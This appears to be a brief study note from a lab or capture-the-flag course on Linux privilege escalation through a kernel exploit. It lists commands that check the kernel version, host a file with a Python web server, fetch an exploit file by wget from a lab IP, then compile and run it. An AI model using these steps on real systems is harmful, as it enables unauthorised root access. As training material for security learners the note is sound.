3. Linux Privilege Escalation: Kernal Exploit

uname -a 
python -m http.server 8000 -> python simple server
cd /tmp
use  wget http://10.10.188.202:8000/37292.c
run C
gcc 37292.c -o my_program
./my_program

Last updated